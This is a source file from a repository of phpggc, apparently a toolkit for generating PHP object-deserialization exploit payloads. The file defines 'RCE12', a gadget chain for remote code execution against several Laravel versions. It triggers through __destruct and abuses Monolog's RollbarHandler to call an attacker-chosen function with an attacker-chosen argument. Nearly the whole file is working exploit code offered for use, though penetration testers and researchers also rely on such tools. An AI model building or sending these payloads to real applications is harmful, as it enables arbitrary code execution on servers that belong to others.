Codebase list phpggc / a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8 gadgetchains / Laravel / RCE / 12 / chain.php
a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8

Tree @a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8 (Download .tar.gz)

chain.php @a0c45150-ee46-4d00-8416-0c7c72366661/upstream/0.20210218+git20221216.0.23e29e8raw · history · blame

<?php

namespace GadgetChain\Laravel;

class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '5.8.35, 7.0.0, 9.3.10';
    public static $vector = '__destruct';
    public static $author = 'CyanM0un';
    public static $information = 'According to different version you may need to modify the "gadgets.php". For Laravel5, use the field $rollbarNotifier. For laravel7 and later, use the filed $rollbarLogger';


    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $param = $parameters['parameter'];

        $a = new \Monolog\Handler\RollbarHandler($function, $param);

        return $a;
    }
}